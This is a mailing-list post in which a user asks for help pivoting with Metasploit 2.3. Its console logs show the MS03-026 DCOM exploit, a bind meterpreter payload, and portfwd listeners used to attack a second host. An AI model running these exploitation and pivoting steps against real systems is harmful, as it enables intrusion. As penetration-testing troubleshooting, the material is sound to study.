Metasploit mailing list archives

use of meterpreter (copy for the list )

From: thomas.werth at vahle.de (Thomas Werth)
Date: Mon, 18 Apr 2005 10:07:48 +0200

Does the bind handler ever say it established the connection?  Does it
say this before or after the 'Connected to REMACT'?  If it says that the
bind handler has established the connection before the 'REMACT' line
then you may have created the port forward too soon.  Can you include
the full output from the exploit command?

bind handler doesn't say it establishes a connection. Just saw that on
meterpreter window an error is thrown up open_tcp_channel: failure, 10061.

i'll attach full log of what i did, just as note after

meterpreter> portfwd -v
Local port forward listeners:

  127.0.0.1:9000 <-> 10.10.10.77:135
  127.0.0.1:4444 <-> 10.10.10.77:4444
meterpreter>

i start second window and when hitting in second window "exploit" the
error msg comes in window 1 .
here's the log :

"Window 1"
vpc189:/usr/local/security/exploits/framework-2.3 # ./msfconsole


                                  _       _
             _                   | |     (_)_
 ____   ____| |_  ____  ___ ____ | | ___  _| |_
|    \ / _  )  _)/ _  |/___)  _ \| |/ _ \| |  _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
                           |_|


+ -- --=[ msfconsole v2.3 [56 exploits - 69 payloads]

msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026 > show options

Exploit Options
===============

  Exploit:    Name      Default    Description
  --------    ------    -------    ------------------
  required    RHOST                The target address
  required    RPORT     135        The target port

  Target: Windows NT SP6/2K/XP/2K3 ALL

msf msrpc_dcom_ms03_026 > set RHOST 10.10.10.88
RHOST -> 10.10.10.88
msf msrpc_dcom_ms03_026 > set PAYLOAD win32_bind_meterpreter
PAYLOAD -> win32_bind_meterpreter
msf msrpc_dcom_ms03_026(win32_bind_meterpreter) > show options

Exploit and Payload Options
===========================

  Exploit:    Name      Default        Description
  --------    ------    -----------    ------------------
  required    RHOST     10.10.10.88    The target address
  required    RPORT     135            The target port

  Payload:    Name        Default
                            Description
  --------    --------
----------------------------------------------------------------------
  ------------------------------------------
  required    EXITFUNC    thread
                            Exit technique: "process", "thread", "seh"
  required    METDLL
/usr/local/security/exploits/framework-2.3/data/meterpreter/metsrv.dll
  The full path the meterpreter server dll
  required    LPORT       4444
                            Listening port for bind shell

  Target: Windows NT SP6/2K/XP/2K3 ALL

msf msrpc_dcom_ms03_026(win32_bind_meterpreter) > exploit
[*] Starting Bind Handler.
[*] Connected to REMACT with group ID 0x9a3c
[*] Got connection from 10.10.10.189:32784 <-> 10.10.10.88:4444
[*] Sending Stage (2834 bytes)
[*] Sleeping before sending dll.
[*] Uploading dll to memory (69643), Please wait...
[*] Upload completed
meterpreter>
[ -=    connected to    =- ]
[ -= meterpreter server =- ]
[ -=    v.  00000500    =- ]
meterpreter> use -m Net
loadlib: Loading library from 'ext212326.dll' on the remote machine.
meterpreter>
loadlib: success.
meterpreter> portfwd -a -L 127.0.0.1 -l 9000 -h 10.10.10.77 -p 135
portfwd: Successfully created local listener on port 9000.
meterpreter> portfwd -a -L 127.0.0.1 -l 4444 -h 10.10.10.77 -p 4444
portfwd: Successfully created local listener on port 4444.
meterpreter> portfwd -v
Local port forward listeners:

  127.0.0.1:9000 <-> 10.10.10.77:135
  127.0.0.1:4444 <-> 10.10.10.77:4444
meterpreter>
open_tcp_channel: failure, 10061.
meterpreter>
-------------------------------------------------------
"Window 2"
vpc189:/usr/local/security/exploits/framework-2.3 # ./msfconsole



                |                    |      _) |
 __ `__ \   _ \ __|  _` |  __| __ \  |  _ \  | __|
 |   |   |  __/ |   (   |\__ \ |   | | (   | | |
_|  _|  _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
                              _|


+ -- --=[ msfconsole v2.3 [56 exploits - 69 payloads]

msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026 > set PAYLOAD win32_bind
win32_bind              win32_bind_meterpreter  win32_bind_stg_upexec
win32_bind_dllinject    win32_bind_stg          win32_bind_vncinject
msf msrpc_dcom_ms03_026 > set PAYLOAD win32_bind
PAYLOAD -> win32_bind
msf msrpc_dcom_ms03_026(win32_bind) > show options

Exploit and Payload Options
===========================

  Exploit:    Name      Default    Description
  --------    ------    -------    ------------------
  required    RHOST                The target address
  required    RPORT     135        The target port

  Payload:    Name        Default    Description
  --------    --------    -------
------------------------------------------
  required    EXITFUNC    thread     Exit technique: "process",
"thread", "seh"
  required    LPORT       4444       Listening port for bind shell

  Target: Windows NT SP6/2K/XP/2K3 ALL

msf msrpc_dcom_ms03_026(win32_bind) > set RHOST 127.0.0.1
RHOST -> 127.0.0.1
msf msrpc_dcom_ms03_026(win32_bind) > set RPORT 9000
RPORT -> 9000
msf msrpc_dcom_ms03_026(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Got connection from 127.0.0.1:32786 <-> 127.0.0.1:4444

[*] Exiting Bind Handler.

msf msrpc_dcom_ms03_026(win32_bind) >
---------------------------------------------
i'm getting same error when delaying creation of portfwd to right after
"Connected to REMACT with group ID 0xecd7"

here's a second log of window 2

msf msrpc_dcom_ms03_026(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Connected to REMACT with group ID 0xecd6
[*] Exiting Bind Handler.

msf msrpc_dcom_ms03_026(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Connected to REMACT with group ID 0xecd7
[*] Got connection from 127.0.0.1:32814 <-> 127.0.0.1:4444

[*] Exiting Bind Handler.

msf msrpc_dcom_ms03_026(win32_bind) >

First i tried without portfwd of Port 4444, second i pushed it right in
after connect msg.

here's according log from window 1:

meterpreter> portfwd -r  -L 127.0.0.1 -l 4444 -h 10.10.10.77 -p 4444
portfwd: Successfully destroyed local listener on port 4444.
meterpreter> portfwd -a -L 127.0.0.1 -l 4444 -h 10.10.10.77 -p 4444
portfwd: Successfully created local listener on port 4444.
meterpreter>
open_tcp_channel: failure, 10061.
meterpreter>


hope this will help you to help me :D

Current thread:

use of meterpreter Thomas Werth (Apr 14)
- use of meterpreter mmiller at hick.org (Apr 14)
  - use of meterpreter (copy for the list ) Thomas Werth (Apr 14)
    - use of meterpreter (copy for the list ) mmiller at hick.org (Apr 14)
    - use of meterpreter (copy for the list ) Thomas Werth (Apr 14)
    - use of meterpreter (copy for the list ) Thomas Werth (Apr 14)
    - use of meterpreter (copy for the list ) mmiller at hick.org (Apr 15)
    - use of meterpreter (copy for the list ) Thomas Werth (Apr 15)
    - use of meterpreter (copy for the list ) mmiller at hick.org (Apr 15)
    - use of meterpreter (copy for the list ) Thomas Werth (Apr 18)
    - use of meterpreter (copy for the list ) mmiller at hick.org (Apr 18)
    - use of meterpreter (copy for the list ) Thomas Werth (Apr 18)
    - use of meterpreter (copy for the list ) Thomas Werth (Apr 18)
    - use of meterpreter (copy for the list ) Thomas Werth (Apr 19)
    - use of meterpreter (copy for the list ) mmiller at hick.org (Apr 19)
    - use of meterpreter (copy for the list ) Thomas Werth (Apr 19)
    - use of meterpreter (copy for the list ) mmiller at hick.org (Apr 20)